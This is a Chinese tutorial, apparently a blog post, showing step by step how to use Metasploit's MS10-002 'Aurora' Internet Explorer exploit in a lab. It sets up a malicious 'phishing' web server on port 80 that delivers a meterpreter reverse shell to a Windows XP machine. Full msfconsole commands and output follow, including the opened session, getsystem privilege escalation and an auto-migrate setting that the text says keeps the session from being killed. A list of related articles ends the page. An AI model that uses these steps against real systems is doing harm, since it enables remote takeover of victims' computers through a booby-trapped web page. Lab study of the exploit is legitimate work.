ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
目录
- 一、MS10_002极光漏洞
- 二、高级属性
一、MS10_002极光漏洞
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习
测试环境 | 描述 | ip |
---|---|---|
主机 | kali2020 | 192.168.1.113 |
目标主机 | win xp sp3 | 192.168.1.106 |
①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数
msf6 > search ms10_002Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption1 exploit/windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-FreeInteract with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_objectmsf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/browser/ms10_002_aurora) > optionsModule options (exploit/windows/browser/ms10_002_aurora):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)URIPATH no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.1.113 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automaticmsf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
②提示已经在本机80端口开启钓鱼网站,打开靶机的浏览器输入192.168.1.106
③主机成功渗透靶机,获取meterpreter权限
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800msf6 exploit(windows/browser/ms10_002_aurora) > sessionsActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter x86/windows WINXP-1\st21 @ WINXP-1 192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
二、高级属性
使用advanced查看高级属性
msf6 exploit(windows/browser/ms10_002_aurora) > advancedModule advanced options (exploit/windows/browser/ms10_002_aurora):Name Current Setting Required Description---- --------------- -------- -----------ContextInformationFile no The information file that contains context informationDisablePayloadHandler false no Disable the handler code for the selected payloadEnableContextEncoding false no Use transient context when encoding payloadsListenerComm no The specific communication channel to use for this serviceSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"SSLCompression false no Enable SSL/TLS-level compressionSendRobots false no Return a robots.txt file if asked for oneURIHOST no Host to use in URI (useful for tunnels)URIPORT no Port to use in URI (useful for tunnels)VERBOSE false no Enable detailed status messagesWORKSPACE no Specify the workspace for this modulePayload advanced options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------AutoLoadStdapi true yes Automatically load the Stdapi extensionAutoRunScript no A script to run automatically on session creation.AutoSystemInfo true yes Automatically capture system information on initialization.AutoUnhookProcess false yes Automatically load the unhook extension and unhook the processAutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in secondsEnableStageEncoding false no Encode the second stage payloadEnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimalHandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored forHTTP transportsInitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)PayloadBindPort no Port to bind reverse tcp socket to on target system.PayloadProcessCommandLine no The displayed command line that will be used by the payloadPayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUIDPayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDsPingbackRetries 0 yes How many additional successful pingbacksPingbackSleep 30 yes Time (in seconds) to sleep between pingbacksPrependMigrate false yes Spawns and runs shellcode in new processPrependMigrateProc no Process to spawn and run shellcode inReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOSTReverseListenerBindAddress no The specific IP address to bind to on the local systemReverseListenerBindPort no The port to bind to on the local system if different from LPORTReverseListenerComm no The specific communication channel to use for this listenerReverseListenerThreaded false yes Handle every connection in a new thread (experimental)SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killedSessionExpirationTimeout 604800 no The number of seconds before this session should be forciblyshut downSessionRetryTotal 3600 no Number of seconds try reconnecting for on network failureSessionRetryWait 10 no Number of seconds to wait between reconnect attemptsStageEncoder no Encoder to use if EnableStageEncoding is setStageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is setStageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatibleStagerRetryCount 10 no The number of times the stager should retry if the first connect failsStagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attemptsVERBOSE false no Enable detailed status messagesWORKSPACE no Specify the workspace for this module
例如,在连接到目标电脑后迅速迁移到其他进程,防止被杀:
msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站相关推荐
- ms08_067漏洞渗透步骤——MSF
本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192. ...
- 基于XP系统IE极光漏洞渗透
极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死. ...
- 内网渗透测试 MSF搭建socks代理
环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...
- Kali Linux 如何搭建钓鱼WIFI(图文炒鸡详细)
0x00 将网卡切换到监听模式并创建热点 airmon-ng start wlan0 这里是建立监听模式 如果出现wlan0mon则表示成功! 接下来创建热点 airbase-ng -e Free-w ...
- 配置域名和服务器-如何搭建个人网站
步骤 要搭建个人网站,只需三步: 购买域名 购买云服务器 配置域名关联云服务器 购买域名 大家可以在自己信任的网站上购买一个域名 因为小伙伴推荐,我在 GoDaddy 上买了一个域名:wecheris ...
- Beef加载msf插件---metasploit对IE浏览器的极光漏洞进行渗透利用
1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 ...
- 渗透测试之地基服务篇:无线攻防之Kali自搭建钓鱼Wifi
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
极光漏洞实际上是利用了堆喷射技术.下面我们来演示渗透过程. 1.查看 win xp 系统状态 目前的cpu和内存消耗极低. 2.在kali linux下利用 metasploit 渗透. msf &g ...
- ms10-002“极光漏洞”漏洞复现
1.漏洞原理 针对Internet Explorer"极光"内存损坏的攻击也就是IE浏览器漏洞,因此该漏洞应当不会受操作系统版本的影响: 2.准备阶段 攻击机:kali(192.1 ...
- 使用wifi-pumpkin搭建钓鱼wifi(仅供学习用途)
实验软件及工具 WiFi-Pumpkin WiFi-Pumpkin是一款专用于无线环境渗透测试的完整框架,利用该工具可以伪造接入点完成中间人攻击,同时也支持一些其他的无线渗透测试功能.旨在提供更安全的 ...
最新文章
- tomcat mysql 中文乱码_tomcat 中文乱码, mysql 中文乱码_MySQL
- 在 CentOS 8 中删除旧的 Linux 内核
- python实习做什么工作-大一/大二学生Python实习的困惑?
- Centos sudo添加用户
- VS2017 网站打包发布生成的文件中包含.pdb文件,解决办法
- leetcood学习笔记-2-两数相加
- java0到9的字符怎么表示_java,_java 怎么生成一个0-9,a-z的一个44位字符串作为上传文件的名字,java - phpStudy...
- 企业上市上市央企大面积亏损折射出啥弊端?
- 【java】swing构件的操作
- java类的命名规范_一篇搞定Java命名规范
- Django中的 返回json对象的方式
- SpringAOP配置与使用(示例)
- 马克思主义基本原理【0163】
- 论文笔记—RGB-D SLAM in Dynamic Environments Using Static Point Weighting
- 信息系统监理师题库_软考信息系统监理师题库
- 《计算机是怎样跑起来的》读书笔记
- 44道javaScript变态题(上)
- 2022-04-24_数组的定义和初始化
- 视觉SLAM十四讲 第1-2讲 初识SLAM
- 憨猫的EventLoop事件循环小解
热门文章
- WIN10 企业版 LTSC 激活
- Dev C++项目开发是添加背景音乐 CC++
- LM2596S-ADJ DC-DC降压芯片使用
- Oracle轻量级客户端下载,Oracle轻量级客户端使用,Oracle轻量级客户端配置,本地同时安装服务器端和客户端,并实现plsql developer连接
- 使用js获取移动端设备屏幕高度和宽度尺寸的方法
- 质性数据分析软件NVivo的安装选项和参数
- 微信小程序实现仿美团外卖饿了么左右联动页面
- matlab验证dtft移位性质,7.DTFT的Matlab实现.ppt
- 短视频APP系统源码 直播系统源码
- 老照片免费修复软件有哪些?一键智能修复老照片工具推荐给你